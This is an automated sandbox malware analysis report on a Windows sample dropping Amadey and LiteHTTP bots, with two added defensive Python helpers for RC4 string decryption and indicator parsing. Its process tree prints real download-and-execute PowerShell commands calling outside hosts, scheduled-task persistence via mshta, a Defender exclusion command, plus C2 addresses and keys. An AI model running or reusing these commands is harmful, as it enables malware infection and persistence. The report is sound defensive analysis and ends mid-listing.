Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 · arch:x86 · image:win7-20240903-en · locale:en-us · os:windows7-x64 · system
  • submitted
    05/03/2025, 21:37

General

  • Target

    f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe

  • Size

    938KB

  • MD5

    865b70535cac91a7fb0a5e7453798edc

  • SHA1

    bf3e1c9613ef801ad1ff939717bce851cc555282

  • SHA256

    f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c

  • SHA512

    73bf144459c82e83a2cd039d9ca2002268bc8df2aa19ff80fc5d0feb722c8dd38974daad5b8d9a9069d9cf5bb9220582cce1e8fc907f3090677ff2bbd4149138

  • SSDEEP

    24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:ATvC/MTQYxsWR7a0X

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

(This ps1 configuration was extracted three times with identical content; the process tree below shows three PowerShell download stages fetching this URL.)

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain
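
How the strings_key above is used, as an added example that is not part of this report or of the Amadey code itself: Amadey keeps its embedded strings as RC4 ciphertext keyed by the 32-character key (the rc4.plain label above refers to that key), so recovering them is a plain RC4 pass. The page carries no ciphertext, so the sample blobs below are constructed by encrypting the config values from this page with the same key; that the blobs are hex text and that the key bytes are the ASCII of strings_key are assumptions, stated again in the code.

```python
# Added example, not part of the report or of Amadey itself.

# Key taken from the Amadey config above (strings_key / rc4.plain).
STRINGS_KEY = "a131b127e996a898cd19ffb2d92e481b"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # keystream generation XORed into the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_selfcheck() -> bool:
    """Public RC4 test vector: key 'Key', plaintext 'Plaintext' -> bbf316e8d940af0ad3."""
    return rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"


def decrypt_string(hex_blob: str, key: str = STRINGS_KEY) -> str:
    """Decrypt one Amadey string.
    Assumptions: the blob is hex text and the RC4 key is the ASCII bytes of strings_key."""
    return rc4(key.encode("ascii"), bytes.fromhex(hex_blob)).decode("utf-8", "replace")


def encrypt_string(plain: str, key: str = STRINGS_KEY) -> str:
    """Inverse of decrypt_string; used here only to build offline sample blobs."""
    return rc4(key.encode("ascii"), plain.encode("utf-8")).hex()


# Constructed sample blobs: the config values from this page, encrypted here with the
# same key. They are NOT ciphertext taken from the binary.
SAMPLE_BLOBS = [encrypt_string(s) for s in
                ("/Ni9kiput/index.php", "rapes.exe", "bb556cff4a", "http://176.113.115.6")]


def decrypt_all(blobs, key: str = STRINGS_KEY) -> list:
    """Decrypt a list of hex blobs; anything that is not valid hex yields None."""
    result = []
    for blob in blobs:
        try:
            result.append(decrypt_string(blob, key))
        except ValueError:                    # bytes.fromhex() rejects non-hex input
            result.append(None)
    return result


if __name__ == "__main__":
    assert rc4_selfcheck()
    for blob, plain in zip(SAMPLE_BLOBS, decrypt_all(SAMPLE_BLOBS)):
        print(f"{blob}  ->  {plain}")
```

rc4_selfcheck() pins the primitive to the public RC4 test vector, so a garbled result on blobs pulled from a real sample points at the key or encoding assumption rather than at the cipher implementation.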

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell with its display window hidden.

  • Downloads MZ/PE file 7 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
    "C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn pf31lmaj1I6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\kJVc9mbRk.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn pf31lmaj1I6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\kJVc9mbRk.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2940
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\kJVc9mbRk.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3052
        • C:\Users\Admin\AppData\Local\TempLNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE
          "C:\Users\Admin\AppData\Local\TempLNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2684
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2520
            • C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
              "C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2980
              • C:\Users\Admin\AppData\Local\Temp\onefile_2980_133856843264360000\chromium.exe
                C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2256
            • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
              "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2252
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\4rzWMGyX\Anubis.exe""
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1832
            • C:\Users\Admin\AppData\Local\Temp\10106670101\e6bc895219.exe
              "C:\Users\Admin\AppData\Local\Temp\10106670101\e6bc895219.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2148
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn AVDbvmaT9tC /tr "mshta C:\Users\Admin\AppData\Local\Temp\yOVRebNFW.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2240
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn AVDbvmaT9tC /tr "mshta C:\Users\Admin\AppData\Local\Temp\yOVRebNFW.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1332
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\yOVRebNFW.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:2224
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ACANVAWAQ9CRKX1CMK3AVZHHQ4CWEAOY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2632
                  • C:\Users\Admin\AppData\Local\TempACANVAWAQ9CRKX1CMK3AVZHHQ4CWEAOY.EXE
                    "C:\Users\Admin\AppData\Local\TempACANVAWAQ9CRKX1CMK3AVZHHQ4CWEAOY.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2808
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2664
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2612
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2004
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2012
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2596
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2536
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1680
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2280
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "8sGwtmaLIn2" /tr "mshta \"C:\Temp\gMZT8wqvY.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1600
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\gMZT8wqvY.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2164
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1804
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2980
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2064
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1272
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2056
            • C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
              "C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2344
              • C:\Users\Admin\AppData\Local\Temp\dll32.exe
                "C:\Users\Admin\AppData\Local\Temp\dll32.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:588
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpDF48.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpDF48.tmp.bat
                  8⤵
                  PID:568
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    9⤵
                    PID:2088
                  • C:\Windows\system32\tasklist.exe
                    Tasklist /fi "PID eq 588"
                    9⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1796
                  • C:\Windows\system32\find.exe
                    find ":"
                    9⤵
                    PID:1324
                  • C:\Windows\system32\timeout.exe
                    Timeout /T 1 /Nobreak
                    9⤵
                    • Delays execution with timeout.exe
                    PID:2228
                  • C:\Windows\system32\tasklist.exe
                    Tasklist /fi "PID eq 588"
                    9⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2764
                  • C:\Windows\system32\find.exe
                    find ":"
                    9⤵
                    PID:2744
                  • C:\Windows\system32\timeout.exe
                    Timeout /T 1 /Nobreak
                    9⤵
                    • Delays execution with timeout.exe
                    PID:1616
                  • C:\Windows\system32\tasklist.exe
                    Tasklist /fi "PID eq 588"
                    9⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2476
                  • C:\Windows\system32\find.exe
                    find ":"
                    9⤵
                    PID:940
                  • C:\Windows\system32\timeout.exe
                    Timeout /T 1 /Nobreak
                    9⤵
                    • Delays execution with timeout.exe
                    PID:2584
            • C:\Users\Admin\AppData\Local\Temp\10106970101\35688f745c.exe
              "C:\Users\Admin\AppData\Local\Temp\10106970101\35688f745c.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2284
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1200
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1316

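The persistence and download stages in the tree above, parsed for indicators, as an added example that is not part of this report: the input is a constructed list of command lines copied from the tree, and the parsers pull out the scheduled-task name, interval and .hta path of each "schtasks /create ... mshta" line, and the URL and on-disk path of each PowerShell download-and-run line. The drop-path resolution reproduces a quirk that the tree records faithfully: "$env:temp+'LNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE'" has no path separator, so PowerShell concatenates the strings and the file lands at "C:\Users\Admin\AppData\Local\TempLNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE" beside the Temp folder rather than inside it (the Downloads list confirms this), while the third stage's "'\483d2fa8a0d53818306efeb32d3.exe'" does land inside Temp. SANDBOX_TEMP is an assumption that %TEMP% had the value seen for the sandbox user throughout.

```python
import re

# Added example, not part of the report. Constructed sample: command lines copied
# verbatim from the process tree on this page.
SAMPLE_CMDLINES = [
    r'schtasks /create /tn pf31lmaj1I6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\kJVc9mbRk.hta" /sc minute /mo 25 /ru "Admin" /f',
    r'schtasks /create /tn "8sGwtmaLIn2" /tr "mshta \"C:\Temp\gMZT8wqvY.hta\"" /sc minute /mo 25 /ru "Admin" /f',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
    r'''powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"''',
    r'powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"',
]

# Assumption: %TEMP% of the sandbox user, as seen in the tree, for every stage.
SANDBOX_TEMP = r"C:\Users\Admin\AppData\Local\Temp"

SCHTASKS_RE = re.compile(
    r'schtasks\s+/create\s+/tn\s+"?(?P<task>[^\s"]+)"?\s+/tr\s+"(?P<action>.*?)"\s+/sc\s+(?P<sched>\w+)'
    r'(?:\s+/mo\s+(?P<every>\d+))?', re.IGNORECASE)
HTA_PATH_RE = re.compile(r'([A-Za-z]:\\[^"]*?\.hta)', re.IGNORECASE)
WEBCLIENT_RE = re.compile(
    r"\$d=\$env:temp\+'(?P<name>[^']+)';.*?DownloadFile\('(?P<url>[^']+)',\s*\$d\)", re.IGNORECASE)
IWR_RE = re.compile(
    r"Invoke-WebRequest\s+-Uri\s+'(?P<url>[^']+)'\s+-OutFile\s+'(?P<out>[^']+)'", re.IGNORECASE)


def parse_schtasks(cmd):
    """Return task name, schedule and launched .hta of an `schtasks /create` line, or None."""
    m = SCHTASKS_RE.search(cmd)
    if not m:
        return None
    hta = HTA_PATH_RE.search(m.group("action"))   # tolerates the escaped \" quoting style
    return {
        "kind": "scheduled_task",
        "task": m.group("task"),
        "schedule": m.group("sched").lower(),
        "every": int(m.group("every")) if m.group("every") else None,
        "hta": hta.group(1) if hta else None,
    }


def resolve_drop_path(name, temp=SANDBOX_TEMP):
    """Reproduce PowerShell's `$env:temp+'<name>'`: plain string concatenation.
    With no leading backslash the file does not land inside %TEMP%; the name is glued
    onto the word Temp, which is why the tree shows a TempLNOW... entry under Local."""
    return temp + name


def parse_downloader(cmd, temp=SANDBOX_TEMP):
    """Return URL and on-disk path of a PowerShell download-and-run line, or None."""
    m = WEBCLIENT_RE.search(cmd)
    if m:
        path = resolve_drop_path(m.group("name"), temp)
        return {"kind": "webclient_dropper", "url": m.group("url"), "path": path,
                "inside_temp": path.startswith(temp + "\\")}
    m = IWR_RE.search(cmd)
    if m:
        return {"kind": "iwr_dropper", "url": m.group("url"), "path": m.group("out"),
                "inside_temp": m.group("out").startswith(temp + "\\")}
    return None


def triage(cmdlines, temp=SANDBOX_TEMP):
    """Run both parsers over a list of command lines; lines matching neither are skipped."""
    findings = []
    for cmd in cmdlines:
        f = parse_schtasks(cmd) or parse_downloader(cmd, temp)
        if f:
            findings.append(f)
    return findings


def iocs(findings):
    """Collapse findings to a sorted, de-duplicated list of URLs, dropped files and .hta paths."""
    out = set()
    for f in findings:
        for key in ("url", "path", "hta"):
            if f.get(key):
                out.add(f[key])
    return sorted(out)


if __name__ == "__main__":
    found = triage(SAMPLE_CMDLINES)
    for f in found:
        print(f)
    print(iocs(found))
```

The "inside_temp" flag is the practical caveat: a hunt that only lists the contents of %TEMP% misses the first two payloads, which sit in %LOCALAPPDATA% under a name beginning with "Temp". The Get-Random line from am_no.cmd is included to show that the parsers ignore PowerShell that neither downloads nor schedules anything.
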
Network

MITRE ATT&CK Enterprise v15

Downloads

            • C:\Temp\gMZT8wqvY.hta

              Filesize

              779B

              MD5

              39c8cd50176057af3728802964f92d49

              SHA1

              68fc10a10997d7ad00142fc0de393fe3500c8017

              SHA256

              f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

              SHA512

              cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

            • C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe

              Filesize

              11.5MB

              MD5

              9da08b49cdcc4a84b4a722d1006c2af8

              SHA1

              7b5af0630b89bd2a19ae32aea30343330ca3a9eb

              SHA256

              215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd

              SHA512

              579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

            • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

              Filesize

              48KB

              MD5

              d39df45e0030e02f7e5035386244a523

              SHA1

              9ae72545a0b6004cdab34f56031dc1c8aa146cc9

              SHA256

              df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

              SHA512

              69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

            • C:\Users\Admin\AppData\Local\Temp\10106670101\e6bc895219.exe

              Filesize

              938KB

              MD5

              15743c2914c612762ee60b2f12678ecf

              SHA1

              b5aedc0e729c59675d5000ef153ea45611ee3dea

              SHA256

              5f7ca62b9d262cf5145711224a4c498739904b721a7131e52bdf9265a441d895

              SHA512

              926c21456df80d22477baa3c03c5bc175a5aeaa9d0b4efd9f211654fdd120b8fa620328c44a3399a0ab2145cc68eb5b881db7360fe818dee3e312c12b4a44aaf

            • C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd

              Filesize

              1KB

              MD5

              cedac8d9ac1fbd8d4cfc76ebe20d37f9

              SHA1

              b0db8b540841091f32a91fd8b7abcd81d9632802

              SHA256

              5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

              SHA512

              ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

            • C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd

              Filesize

              321B

              MD5

              c471fe8b842145d6b1cf1e88a2a08e97

              SHA1

              103451efb8ff113824e55b0449f73716a5b14c6f

              SHA256

              f556735d16a2f6874e93468ee48d9611083bb0786893c284fba0466e583657ac

              SHA512

              bc63d04142cfe66d3f3df4e54b78e95b73a971618287f50ec9a43e55bf82e64f8932b31cf5cbc359d5c995bc83eff3989bf3922255a419d92169ad939f629f09

            • C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe

              Filesize

              15.0MB

              MD5

              35a4dfb5f0308d20b1e5bf26e0a70509

              SHA1

              0c72b35b74dadbce4a95c034968913de271aae06

              SHA256

              40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339

              SHA512

